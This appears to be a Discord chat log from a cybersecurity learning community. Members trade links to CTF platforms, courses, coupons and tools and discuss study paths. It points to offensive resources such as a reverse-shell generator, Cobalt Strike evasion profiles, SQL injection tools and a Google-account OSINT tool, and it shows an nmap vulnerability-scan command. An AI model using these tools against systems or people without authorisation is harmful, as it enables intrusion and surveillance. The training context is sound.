Ah shit I meant under the wire not over
Ahh perfect, thnks both for the help 🤟🏻
Welcome to PowerShell Explained. Here is a collection of popular resources I have created to explain the way PowerShell works. # Recent Articles Here are the most recent articles that have been posted to the site. {% include recent-posts.md %}* [More](sitemap/?utm_source=blog&...
@dapper hound
xD
aight man I was helping 🥺
no issues
A 4 days old website selling a 225$ course sure isn't sus at all
https://z-r0crypt.github.io/blog/2020/01/22/oswe/awae-preparation/
Great links if you want to work on web exploits
Security Research Blog for learning and sharing
Thanks to all who contributed to Ciphey this hacktoberfest! We just released support for BrainFuck, our first EsoLang 😄 https://github.com/Ciphey/Ciphey/releases/tag/5.8.0
can anyone recommend a good reference for sed?
test cloudflare's waf: https://waf.cumulusfire.net/xss
Hi are there any resources one would recommend for digital forensics? I completed the iOS forensics lab which was amazing, i would like some more to do. Pls guide
Hello all! I am looking for some documentation for Cobalt Strike artifact kit (official or Unofficial)
Hi are there any resources one would recommend for digital forensics? I completed the iOS forensics lab which was amazing, i would like some more to do. Pls guide
@nocturne heart Click on Forensics to see all rooms https://tryhackme.com/hacktivities
GHunt is an OSINT tool to extract information from any Google Account using an email. https://github.com/mxrch/GHunt
Wait, you are not @cloud brook :KannaWhat:
@queen wyvern nop
oh no
Can I have your email pls @cold drift
@queen wyvern send me your email first pls @queen wyvern
blob 2
@cloud brook you have an imposter now
sus
Yeah, I saw him vent
🔨
@odd quest can you ban plz
👀
OI
@cloud brook why?
Cuz you’re imposter
@cloud brook imposter??? oh okay, it's my favorite manga character (TOG)
so, i'm sorry
no sorry just baam 
@cloud brook this is why you slightly edit your photo
so if someone does have it, you know they stole it from you
Python 3.9 🐍 is out! 🥳
Here are the 5 new features you care about.
🧵👇
1539
4895
then copyright claim
Also it’s not a manga
@cloud brook webtoon ah ah
@cloud brook this is why you slightly edit your photo
@tepid patio it’s just a google image tho haha
so if someone does have it, you know they stole it from you
@tepid patio I do not even know its id, in addition I have this photo for a long time (from google image) in all the platforms where I am registered (hackthebox, discord, ...)
Hey I took a class from Lenny many years ago
Lenny maintains the docker image for Ciphey
v/ nice person
also like super very helpful over DM
Like TryHackMe mod level helpful, literally sends me like 20+ messages to explain a problem / help me fix it
Very very nice person
love that folk
Yup, very nice, was a good and patient instructor
It might seem quite basic to some people, but for CTFs (and koth ;) ), this is all you need to know for file upload bypasses
It's only 9 pages, so not a bad read
and it shows you the PHP going on in the background to give you a deeper understanding
I collaborated with Superhero1 and have put out this video on Binary Exploitation, its the first part of a much larger series. New videos will be coming out as time develops.
https://www.youtube.com/watch?v=fuV0p8mop5w
In this video we will look at two simple demos on Linux by reverse engineering and learn about buffer overflows.
Please subscribe, like & comment!
Cheers, superhero1
[ #! cat superhero1-links.txt _ ]
Tools
- GDB https://www.gnu.org/software/gdb/download/
- radare2 https://g...
Hello all! I am looking for some documentation for Cobalt Strike artifact kit (official or Unofficial)
@low goblet Anyone?
Did somebody say free certs 👀
I bought the book and I wanted to share it with the community. Enjoy 
uhh
1 second 👒
All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means,
The Ebook is Free if you buy the book
ok 2 the secret chat i go 🦇
Not for distribution
It can not be free if it's bought 😫
@random elk go to #talk-with-us-no-threading please, let's discuss this there 😄
Don't have access to talk-with-us
check again
They don't have the role Bee
they do now
Not on my end 
They had it earlier
feck it i'll just leave em in there hopefully they'll get the message 
kek
ok its solved
that chat is just 99.9% discord caching issues
A free guided path for beginners on TryHackMe.com
Still not have access but it's not a big deal, I won't send anything "illegal" anymore 😂👍🏻
The fact that you've put it in quotes makes me thing you don't understand the fact piracy is illegal
Not at all I put it in quotes because it's illegal for you but not for me because I bought it 😉
Sorry for this mistake
The distribution is illegal. So it's illegal for you. @random elk
Alright, I banned him for that commentary
I was waiting for someone to ban him 
Someone just spammed another discord wtih a free cybersecurity course (good 2020/10/07 only)
Free Udemy Course for today: https://www.udemy.com/course/offensive-security-engineering/?couponCode=SP00KY-FR33-H4X
thanks ! @faint prism
The price is right..
I want to say TCM also made part of one of the courses free
Ahah. the devils in the details (comments below) ty
Other than CERT/the osint github, can you guys think of any other halfway decent free threat intelligence lists to pull from
oh god
i told you
dont use that link
here
i'll repost it for you 🙂 Please in the future use links that do not have some encoded 4000 character parameter 😛
hey guys, for a course in my cs degree, I have to attend an it related webinar and write a report on it. Since ive been so interested in cybersecurity I would love to follow a cybersec related webinar. Unfortunately im not exactly finding anything interesting... Anybody that has good sources for security related webinars? (it has to be in the future and live, im not allowed to watch a video of a seminar/webinar from the past)
Search for a local BSides online event in your area @thick zodiac
oh thanks! will do!
Search for a local BSides online event in your area @thick zodiac
@craggy onyx
what if area doesn't have local events 🤔 ... it's soo rare here
When they're online, it is possible to attend them by signing up beforehand. Find the nearest one you deem useful. 👍
In case someone didnt know, mostly beginners like me, PayloadsAllTheThings by swissky is fantastic
There is the ZTH obscure vulns room which has that included
Your one allowed EcCouncil non-MLM non-spam link for the day
https://www.eccu.edu/cyber-challenge/
accepting writeups for my newest room, motunui :)
here is my official one: https://www.jake-ruston.com/posts/tryhackme-motunui.php
This is my official writeup for my hard rated room, Motunui.
accepting writeups for my newest room, motunui :)
here is my official one: https://www.jake-ruston.com/posts/tryhackme-motunui.php
@night ether this seems like a very cool room. Different. I like the concepts. Thanks for the write up
This is my official writeup for my hard rated room, Motunui.
good resources to learn RE?
@queen wyvern Thx ^^
guys
any reverse engineering resources (very basic)
cuz i'm really noob @ rev eng
tnx
https://guyinatuxedo.github.io/01-intro_assembly/assembly/index.html
anybody read this?
Nightmare: an intro to binary exploitation / reverse engineering course based around CTF challenges.
@tepid patio https://www.youtube.com/watch?v=fuV0p8mop5w
i just find this
In this video we will look at two simple demos on Linux by reverse engineering and learn about buffer overflows.
Please subscribe, like & comment!
Cheers, superhero1
[ #! cat superhero1-links.txt _ ]
Tools
- GDB https://www.gnu.org/software/gdb/download/
- radare2 https://g...
A list of good resources to make a level up? Interesting writeups, some books, links
Introducing HAT - The Hashcat Automation Tool has received 100 stars on Github! Wh00t!!!
If you're a pentester who wants to automate the laborious task configuring hashcat for every wordlist and add a bit of flaw check out HAT. Links to large working wordlists too! https://t.co/10xQH2caeT
guys
any reverse engineering resources (very basic)
cuz i'm really noob @ rev eng
tnx
@keen field
# Resources
These are the resources I have found while learning about the binary exploitation.
### Blogs:-
* <https://syedfarazabrar.com/>
* <https://kileak.github.io>
* <https://d4mianwayne.github.io/>
* <https://ctf101.org/binary-exploitation/buffer-overflow/>
* <https://blog.skullsecurity.org/category/ctfs>
### Youtube:-
* <https://www.youtube.com/channel/UCi-IXmtQLrJjg5Ji78DqvAg/videos>
* <https://www.youtube.com/playlist?list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN>
### Wargames:-
* <http://pwnable.kr/>
* <http://pwnable.tw/>
* <http://pwn.eonew.cn>
* <https://www.root-me.org/?lang=en>
* <http://smashthestack.org/>
* <https://exploit.education/>
### Pwn Related Stuffs:-
* PwnTips - <https://github.com/Naetw/CTF-pwn-tips>
* Quick guide -<https://trailofbits.github.io/ctf/exploits/binary1.html>
* Pwn Challenge List - <https://pastebin.com/uyifxgPu>
### Stuff Robin gave me:-
* Course materials for Modern Binary Exploitation by RPISEC - <https://github.com/RPISEC/MBE>
* Learn ROP - <https://ropemporium.com/>
* For Linux binary Exploitation - <https://github.com/scwuaptx/HITCON-Training>
* Intro to binary exploitation / reverse engineering course - <https://guyinatuxedo.github.io/>
* A collection of pwn/CTF related utilities for Ghidra - <https://github.com/0xb0bb/pwndra>
* Some pwn challenges selected for training and education. - <https://github.com/BrieflyX/ctf-pwns>
* A set of Linux binary exploitation tasks for beginners on various architectures - <https://github.com/xairy/easy-linux-pwn>
* ASM Basics - <https://asmtutor.com/#lesson1>```
That's more pwn based than re based, but one is a subset of other.
beautiful

In this comprehensive primer, you will learn what happens in the browser between when you type google.com in the address bar until you see the Google page on the browser screen.
where can i find Ryan's CTF style ctf
could someone help me in linuxprivesc machine ... i am unable to send the shell.elf file from my attackers machine to target machine ......task no 10 (wildcards)
#room-help or #room-hints @lean widget
Brought to you by http://www.rasmurtech.com/
The Rasmurtech Community: http://goo.gl/mt6OzH
In this video Rasim from Rasmurtech.com gives us a Intro to his upcoming Assembly Language Programming series. He gives us a overview of all the different lessons this video series wi...
i also recommend 7th ed. of the book above
it's a 0 to hero guide
third time's a charm
found this by chance, has anyone used it?
I have, there's also an "nmap vulners"
@spiral zodiac is that sudo nmap -sV -A -Pn -v --script=vulscan/vulscan.nse or else?
That command is very much redundant, you're using -sV with -A -A does both -sC and -sV as well as -O and traceroute.
yeah i know - but sometimes this works better in this way
that's a complete monster command
i like it
NMAP cheat sheet v7
that's a nice cheat sheet ❤️
https://class.malware.re/2020/04/18/android-intro-and-tools.html
https://resources.infosecinstitute.com/android-penetration-tools-walkthrough-series-dex2jar-jd-gui-baksmali/
In the previous week’s lectures, we covered analysis of compiled Java programs, and particularly, JAR applications. Turns out that this sets up a good foundation for Android malware analysis. The APK file format, used to package android applications, is an extension to the JAR...
will be hard then, when we wanna find all these sources here
Reverse Tunneling made easy for pentesters, by pentesters https://sysdream.com/ - sysdream/ligolo
https://pwn.college
https://ctf.pwn.college
This site seems to have a decent amount of information and challenges on pwn stuffs
I've seen the first one before
I think the ctf part was released recently, but there seems to be a lot of challenges on it.
It's from ASU, the creators of this platform are current DefconCTF organizers, and of course from Shellphish team.
A site to practice writing secure code https://securecodewarrior.com/become-a-secure-code-warrior
We get it. You're here because you want to start left but maybe you don't know where to begin? And we want you to start left because we want you to think and act with a secure coding mindset; without needing to become a security expert. We ultimately want you to ship secure co...
We'll be covering the very basics required to understand what makes a Linux executable run from the perspective of someone approaching a binary with no further context. This includes compilation steps, program loading, library relocation, program sections, stack frames, assemb...
Really great summarisation of a deep dive into the rampant "Trickbot" ransomware https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/
Are there any good resources for setting up a android pen-test environment? I have an extra android phone so I don't need an emulator unless working with an emulator is easier. Would like to start testing mobile apps and platforms but not sure where to start.
Use john (and anything else in /usr/sbin) without sudo as root: while logged in as root, append this line in ~/.bashrc
export PATH=/usr/sbin:$PATH
Very useful OSINT cheat sheet;
https://docs.google.com/document/d/1BfLPJpRtyq4RFtHJoNpvWQjmGnyVkfE2HYoICKOGguA/edit#heading=h.po9n93ahppok
List of APT Threat Actors and Attacks. https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/pubhtml#
Steal my spreadsheet like that 

Guys, I'm having hard time with BOF.
Please share some good resource for learning BOF for OSCP.
Share link to it Link
@cerulean viper if that's a referral link, please replace it with a generic link to the resource 🙂
okaie
Hacker Halted 2019 | Atlanta, GA October 10 and 11 2019 | Secure Your Data.. Not all Treasure is Gold
hey guys! greetings
so I just received an email from cybrary.com , they're offering me like 70% off to their annual subscription, $630 off discount after applying the coupon
Its $900 annualy but with coupon its only $270 🥺 I wish I had money atm..
anyways, If anyone of you is interested in that then lemme know, since it can be used only once and
its ending in 14 hours from now ,
time lmao
🤷♂️
Malpedia is a free service offered by Fraunhofer FKIE. Administration is lead by Daniel Plohmann and Steffen Enders.
How much fun it is to click through random links
if you’re uncomfortable with links use virustotal. NEVER click on a link if you’re uncomfortable or not sure about it until you confirm it is fine
Put the link in virustotal and it tells you if it’s valid?
it will tell you if it is identified by anti virus and malicious checkers, it can identify malware, spam, and phishing campaigns
https://github.com/epi052/feroxbuster <--- Best content discovery tool I've ever used, faster than Gobuster and recursive with proxy support.
https://libc.blukat.me/
@spiral zodiac what is this?
its for binexp
so if you leak a libc address
and you want to know which version of libc it is
you plug the addr into the site
and it tells you
Users use Sticky Notes! 🗒️
I used this on a recent engagement - Ended up finding password amongst others.
First I found window titles that user had up on the desktop, saw sticky note, downloaded the files and parsed it using:
https://t.co/uDT9gMJlem
Great tip 👇 https://t.c...
lots of awesome tools are made by them
Giveaway! 🎉
We're giving away 20x 1-month subscriptions for
@PentesterLab
To Enter:
• Follow @cvebase @PentesterLab
• Retweet this & reply with a link to your favorite CVE on https://t.co/ASdDsEraJH
Winners will drawn & DM'd on Friday, October 23. Good luck!
hey guys just in case you missed, refer to this message segment -
extended time line - till 18th oct 2020... 2 more days I guess
so so , here's the coupon for 70% off
ZLU4Zo14
https://github.com/gpakosz/.tmux
@ebon valve I'm following the same steps but I can't get the new tmux
I'm only getting regular tmux
Oh make sure you have the custom tmux bit
Lemme grab my screenshot for my tmux
Also, make sure it's for the profile you're actually using
If you launch tmux as root, it has to be in the config spot for root
This is for the custom spin on it that I have
https://github.com/gpakosz/.tmux
@ebon valve The best tmux profile!
Facts!^
Basically goto as it's easy and just works
I'm Following this
$ cd
$ git clone https://github.com/gpakosz/.tmux.git
$ ln -s -f .tmux/.tmux.conf
$ cp .tmux/.tmux.conf.local .
But not working
did you restart the tmux server?
I still get the normal tmux
and/or source-file?
did you restart the tmux server?
@pliant moat How can I do that?
after starting tmux?
Yes that just default one not the github one
#beginner friendly
https://www.digitalocean.com/blog/how-to-code-in-python-ebook/
https://github.com/gpakosz/.tmux
Thanks!
.
Anybody wanting to learn about format strings.
https://www.youtube.com/channel/UCWEsU7ckmiPQ8nXR_cJ8DJA/videos
Security geek having fun. You can reach me at: https://twitter.com/0x4ndr3 https://www.linkedin.com/in/aflima/
I m a beginner how to learn cyber security
Have you checked this awesome site : https://tryhackme.com
Yea
That's one such website
But I don’t understand how to start
Which i read book about cyber security
Not cybersec related, but very very cool 😄 https://dev.to/oskarahl/automated-lighthouse-score-on-your-pr-with-vercel-and-github-actions-2ng2
Nice Find 
oh no
Started writing posts on DFIR. It is still in its infancy but the aim is to break down some of the topics and concepts I feel Iare sometimes over complicated in other posts I read when I was starting out. Feel free to check it out and I will be regularly posting.
Jesus that discord RCE looks nasty 😦
Defo a follow from me @inner oriole will be keen to see what you come out with!!
@sturdy shell cheers mate, will endeavour to be quick posting content :)
One of our favorite #infosec conferences approaches -- @Grayhat_Con ! As usual, we'll be running https://t.co/ppYocDgP90! We're only running the CTF for attendees of the conference so go signup for the conference, and then signup for OpenSOC here: https://t.co/Bs9uV3bOTh
This is an amazing opportunity to get SOC experience for free and find out what it’s like in a real live environment
Hi guys! :)
Do checkout my GitHub repo . This one I just updated with what I have encountered before.
I use it for myself but you can try it out too >.<
https://github.com/H0j3n/EazyPeazy/tree/master/My Tools/Ezpz Shell
sure 🙂
Been shared before, but this is my favourite compsci class ever 😄 https://www.edx.org/course/cs50s-introduction-to-computer-science
My First Ever Actually 😄
**More Places to Practice/Learn Hacking **
https://www.hackthebox.eu
Vulnhub
https://www.vulnhub.com
Practical Pentest Labs
https://practicalpentestlabs.com
Labs Wizard Security
https://labs.wizard-security.net
Pentestlab
https://pentesterlab.com/
Hackthis
https://www.hackthis.co.uk
Shellter
https://shellterlabs.com/pt/
Root-Me
https://www.root-me.org/
Zenk-Security
https://www.zenk-security.com/epreuves.php
W3Challs
https://w3challs.com/
NewbieContest
https://www.newbiecontest.org/
The Cryptopals Crypto Challenges
https://cryptopals.com/
Penetration Testing Practice Labs
http://www.amanhardikar.com/mindmaps/Practice.html
alert(1) to win
https://alf.nu/alert1
Hacksplaining
https://www.hacksplaining.com/exercises
Hacker101
https://ctf.hacker101.com
Academy Hackaflag
https://academy.hackaflag.com.br/
PentestIT LAB
https://lab.pentestit.ru
Hacker Security
https://capturetheflag.com.br/
PicoCTF
https://picoctf.com
Explotation Education
https://exploit.education/
Root in Jail
http://ctf.rootinjail.com
CMD Challenge
https://cmdchallenge.com
Try Hack Me
https://tryhackme.com/
Hacking-Lab
https://www.hacking-lab.com/index.html
PWNABLE
https://pwnable.kr/play.php
WHO4REYOU
https://34.73.111.210
Google CTF
https://capturetheflag.withgoogle.com/
ImmersiveLabs
https://immersivelabs.com/
Attack-Defense
https://attackdefense.com/
OverTheWire
http://overthewire.org
SANS Challenger
https://www.holidayhackchallenge.com/
SmashTheStack
http://smashthestack.org/wargames.html```
https://ine.com/pages/cybersecurity
Buy 1 year + get 1 free with the coupon: CS-INTRO (until October 26th)
Free atm, code: FREELEARN
https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course
Taking a google automation with python course and it is super confusing. I am not sure if I am not comprehending the material or their choice of using math to showcase python was not a very good choice
My brain is literally on fire
Pure frustration here😫
hey there , i would like to know what sites to refer from before i start actual hacking , since the courses here are paid right? and i have zero knowledge of hacking.
thank you
Tryhackme is free
Subscribing is optional
I’d suggest trying the platform before making any decisions
is there a step by step process on what to do first
Yes there is.
is there a step by step process on what to do first
@safe wave Do the Welcome Room and OpenVPN Room first to know how to connect properly to the THM Network and do other rooms. Start doing rooms on your dashboard. Go to hacktivities, Sort by Free and Walkthroughs and start doing them
Also check https://blog.tryhackme.com/free_path
anyone knows where i can get basic wordlists from? like rockyou.txt and dirbuster lists'
seclists
nice, thanks!
damn rockyou.txt is actually from a leak
i thought it was some basic made password list
this looks v/ cool
oh nice - great find
I'm eating ahah, just wanted to say hey to you 👉 👈
that'sa cool site
okkiii~~~
@sturdy shell sorry for the ping but would you mind sharing you essay on emotet when it's done?
No worries about the ping (: and sure, although I'm making study notes and then writing up to a blog post rather then an essay. But I can share it when it's written up for definite 👍
@odd peak (:
Appreciate the interest
awesome
Not a cross posting , and it qualifies for a resource as well so ... https://youtu.be/XDvhqpFI0DU
CODE: FREELEARN
https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course
❓Info❓
Hire me: https://tcm-sec.com
🔹The Cyber Mentor Merch🔹
Anyone here can check and give feedback about a recon tool i find in github?
thats not typically what this channel is used for but Im free right now so whatever send it
A good recon tool that have many tools build in : https://github.com/Knowledge-Wisdom-Understanding/recon
so pretty much just a rip off of tibs tool https://github.com/Tib3rius/AutoRecon I mean it can be good for ctfs and practice boxes but thats about it
Yes the autorecon is best too but i have sent a tool that can do more thing , similar like Autorecon but with more feature
But Autorecon is my tool to go.
what features does it offer that tibs tool doesnt?
Just a headsup, it is 100% possible to fake a commit at any time. You can literally make a commit for the date marked january 1st 2019 if you wanted, so this statement doesn't actually hold much value 😄
Just check it out , its really cool tool , it has sowmthing like auto evil-winrm etc and also impact tool is run in auto mode ones the port is there , seclist and many thing is done one by one based on the port and nmap result
auto evil-winrm..?
to be fair, in about a months time rustscan will also have an autoreceon clone
(or, depending on the licenseing, autoreceon itself would be pretty awesome)
Import-Module MakeMeEnterpriseAdmin.ps1 /autobots
It would be awesome if someone could curate a list about these less known but just as good (or better) tools
I'd do it but I don't know enough
@shut ferry you've come to the right place, just scroll up
so let's say for instance i wanted to simulate setting up a network similar to what is used in a call center or hospital. are there any good tutorials for this? i've found one on youtube that goes through setting up a windows server 2019 active directory domain controller. is that what i am looking for? and if so, is there an equivalent for linux?
Hospitals are so vulnerable it can’t even be simulated it’s mad
lol, i'm really just trying to learn how a system administrator would go about setting up a network and then securing it
call centres are quite easy @shut ferry
it's mostly a windows DC with a lot of devices, nowadays a lot of organisations use Twilio as a service provider for call routing, sometimes you may see implemented some QoS too
windows DC?
yeah
oh domain controller, like what i mentioned originally?
what i've set up at my previous place is that + a very stripped down version of widnows
yes
so it's not a lot going on, can't speak about hospitals as i haven't worked for one yet
okay, that's what i'll work on doing then. i'm going to set it up in virtual box, and see how it goes. eventually i would like to attack it to see how secure it is
but call centre i can tell you ^^ as i worked through upgrading from SIP phones to VoIP and stuff
i'm not necessarily interested in the applications on the computers, more so just setting up the environment, roles, and such
you already have a few DC labs on THM so you don't really need to set it up yourself to be fiar
oh okay, i did not know that, thank you
search for Windows in the searchbar, most of them are DCs 🙂 then you also have throwback to mimic real life examples
i've done some of those machines, and sort of know what i'm doing from an attacking standpoint, but i'm wanting to learn from a blue team side of things
i have a room, hopefully coming up soon which focus on blue ^^, should be in the next few releases
it covers smb 1,2,3 ; msrpc and a few other bits and pieces
sounds great, i'll keep a look out for it. i've found the active directory basics room, and that was one of the things i was looking for as well. thank you.
no worries, good luck though
drop a message in #infosec-general or #general if you need any help
will do thanks
Windows Privilege Escalation - whoami /priv (show me your Windows Privileges and I'll show you how to get SYSTEM)
https://2018.romhack.io/slides/RomHack 2018 - Andrea Pierini - whoami priv - show me your Windows privileges and I will lead you to SYSTEM.pdf
👆🏾 this is a really informative presentation on how to leverage local privileges to SYSTEM privileges with whoami /priv
Which one is good nmap or rustscan?
rustscan uses nmap lmao
okay so I better be using nmap then?
I mean the good thing about using rustscan is the creator is one of the mods here and you just bug them to fix things or add features
I also like supporting smaller developers so that too
Guys, any tool recommendation for bluetooth sniffing?
rustscan has a scripting engine as of 4 days ago which supports any language, including Python -- so if you want to write scripts in python there's that 😜✨
Microsoft, in collaboration with MITRE, IBM, NVIDIA, and Bosch, has released — Adversarial ML Threat Matrix Framework — to help security analysts detect, respond to, and remediate adversarial attacks against machine learning (ML) systems.
Details: https://thehackernews.com/2020/10/adversarial-ml-threat-matrix.html
@tepid patio can you elaborate pls? in a pm if this is getting out of scope for this channel
im a big shill and brought algoexpert which has https://www.algoexpert.io/mock-interviews
ohh nice one
@tepid patio do infosec jobs emphasis on coding rounds?
i don't work in infosec, I work in AI so I wouldn't know 😛
Ahh I thought since you posted that guide, you might be an infosec professional
How do you combine AI and infosec?
There's a whole heap of uses for AI in Infosec
A big one is anomaly detection for stuff like IDS & IPS'
Considering an algorithm is used to detect, wouldn't it be plausible to evade it?
Also just realized this might the wrong channel for this discussion 😅
Considering an algorithm is used to detect, wouldn't it be plausible to evade it?
@modest hedge To bypass it, you'd have to understand the algorithm 😛
No one on this planet ever understands exactly how a neural network with 5 billion neurons functions
The power of machine learning models, is to adapt to changing vector landscapes and update detection rules in real-time. Some examples of usage of Machine Learning in security are: Phishing domain detection, Malware detection, Botnet detection, Anomaly detection, IDS evasion detection, Threat Hunting APT detection, etc.. @modest hedge
No one on this planet ever understands exactly how a neural network with 5 billion neurons functions
@tepid patio Didn't think of it like that 😅.
October is Cybersecurity Awareness Month, and CompTIA is here to spread the word! Join our hosts CompTIA’s James Stanger and IT Pro TV’s Don Pezet, along with guests Gabriela Ariza and Chris Cochran, as they cover cybersecurity skills and some free resources to help you grow y...
rustscan has a scripting engine as of 4 days ago which supports any language, including Python -- so if you want to write scripts in python there's that 😜✨
@tepid patio okay will try rust then
Dave Kennedy, TrustedSec’s Founder and CEO runs a hangout session on building your own Python PE executables and building your own C2 from scratch in Python.
this is a really good talk / hangout with Dave Kennedy talks about C2, AV evasion, PE and other advanced topics
Hi mates,
how do you do daily/weekly information monitoring on hacking subject ?
do you use RSS ? do you have any tips or software to share in order to begin a correct ethical hacking information monitoring ?
i have an rss feed but tbh i just pay attention to twitter / this channel
@thick bridge https://portswigger.net/daily-swig one of my favs
https://www.sans.org/newsletters/newsbites also this if you want more high-level stuff
there are tons of sites
also definitely check r/netsec if you're on reddit
thanks ! Seems i really need to check for a RSS reader and set something to begin with.
@thick bridge https://addons.mozilla.org/en-US/firefox/addon/feedbroreader/ I use this
the daily swig has a rss btw
feedly looks awesome ! gonna give it a try thank you
oh that seems better 😄
Feedly has a cyber security section as well, from which to select favorite feeds. It's great. 👍
Dark mode in OWASP ZAP:
get the weekly release here: https://www.zaproxy.org/download/#weekly
Tools > Options > Display > Look & Feel: Choose either Flat dark or Flat darcula
The world’s most widely used web app scanner. Free and open source. Actively maintained by a dedicated international team of volunteers.
well this is neat
https://weibell.github.io/reverse-shell-generator/
Ooooo that’s super cool
I think everyone should read this https://quantum.country/
@worthy blaze offensive path on tryhackme is a good start, if you subscribed which is only like 10/m i think
did i dream that message i swear it was just there
It was posted in general @night ether, maybe you got confused
@night ether Thank dude
Some OSINT + SOCMINT resources I've had on hand during in-lab digital forensic investigations below.
OSINT_SOCMINT.zip - From https://osint.support/chrome-extensions/2019/09/29/osint-socmint-tooling.html, extensions for
Facebook, Instagram, Twitter, TikTok, LinkedIn.
Unzip folder and add extension as unpacked extension
OSINT_BOOKMARKS.html - Has a huge amount of resources in the form of bookmarks (It's fairly dated, but the vast majority should still be useful)
hi guys! Can you send me some good resources for learning reverse engineering?
Nightmare: an intro to binary exploitation / reverse engineering course based around CTF challenges.
Anyone recommend a linux box or writeup similiar to eCPPT DMZ machine. Bufferoverflow done, down to the last box, rooted all except for this machine.
The code from Violent python ported to python3
https://github.com/EONRaider/violent-python3
The code from Black hat python ported to python3
https://github.com/EONRaider/blackhat-python3
Awesome blind SQLi scanning/testing tool:
Bunch more random cool SQLi scanning tools listed here too:
https://www.programmersought.com/article/78141042379/
great pwn tutorial
[PWN] Getting started with pwn, Programmer Sought, the best programmer technical posts sharing site.
Check out my NEW VIDEO !
https://youtu.be/UcjOP0Xkcrg
Thanks For watching
Don't forget to leave a like and Subscribe.
► Follow me!
•Twitch: https://www.twitch.tv/jupiter3047
•Instagram: https://www.instagram.com/bs02p/
•Twitter: https://twitter.com/Jupiter3301/
•...
what are your go-to resources and/or tools for iot pentesting?
The IoT Hacker's Handbook: A Practical Guide to Hacking the Internet of Things, by Aditya Gupta.
@craggy onyx thanks! could I ping you for an additional question?
Go ahead.
https://github.com/fieldraccoon/HostEnumerator an awesome enumeration tool that performs scans, dirs, web analysis and more
improving all the time
Is there anyone here studying for COMPTIA Sec+?
This will be a nice resource soonish 😄 https://www.reddit.com/r/tryhackme/comments/jin1mh/when_to_know_what_tools_to_use/
when people reply
When I reply
I’ll reply when I get a second
Is there anyone here studying for COMPTIA Sec+?
@shut ferry I'm
An ubuntu VM loaded with over 50 docker containers designed by the navy post-graduate school to teach a bunch of infosec stuff. Really cool stuff on here. https://nps.edu/web/c3o/labtainers
Cybersecurity labs for Linux
Im going through it right now and they are all super high quality, I'm really impressed tbh. Each lab comes with a pdf that explains what to do. The docker framework also has an api that starts each lab by module name from the command line, and then automatically launches everything necessary for the lab. I would compare them to Hera Labs.
Thanks for the feedback. The file is big but I'll have to download it now 😄
This will be a nice resource soonish 😄 https://www.reddit.com/r/tryhackme/comments/jin1mh/when_to_know_what_tools_to_use/
@tepid patio Ok I just took longer than I care to admit replying to them
@azure widget Just approved that, for some reason it was flagged
reee
Reee because I approved it or that it was flagged?
flagged
Yeee
Sites For CheatSheets
Cheatsheet on what
INE Discount code for 40% off: els-cyber Valid until 31/12/2020
Cheatsheet on what
@queen wyvern like nmap ,priv esc.... etc
@rapid vortex https://tryhackme.com
@rapid vortex https://tryhackme.com
@topaz gulch ??
Don't need a cheatsheet if you've already been taught what to do
And you should be taking your own notes
Which will become your "cheatsheets" if you need a reminder

There's no point in being handed everything on a platter -- you don't learn that way
Thanks @topaz gulch
We now support 50+ methods of decoding / cracking / decryption / decompressing / de-esolaning(?)
https://github.com/Ciphey/Ciphey
oh opps
hey!
We now support 50+ methods of decoding / cracking / decryption / decompressing / de-esolaning(?) :partyHard: https://github.com/Ciphey/Ciphey
@tepid patio Really Awsome. Love using it
https://www.youtube.com/channel/UCsKK7UIiYqvK35aWrCCgUUA i just found this channel that explains basic web exploits, and he is pretty good at it. But weirdly enough he doesnt have many views even though the quality of the video and the explanation is very high.
https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/ Fun with Cobalt Strike!
It’s not fun to get caught on an assessment because your target has your toolset signatured. It’s even less fun if that signature is easily bypassed. Cobalt Strike’s Malleable C2 is a method of avoiding that problem when it comes to command and control (C2) traffic. Malleable ...
https://www.bc-security.org/post/empire-malleable-c2-profiles/ - this is relevant as Empire is more accessible to users and has a lot of the same feature outlined in that blog post as well as in general
Are there any rooms that teaches exploit development
This might help some of y'all 😄 https://www.reddit.com/r/tryhackme/comments/jj0tme/share_your_favourite_hacking_resources_below/
26 votes and 6 comments so far on Reddit
Hello all! I am looking for some resource to learn python and c# for cybersecurity any suggestions (videos, books,...)
thank you cry ❤️ I should really turn that into something useful :P




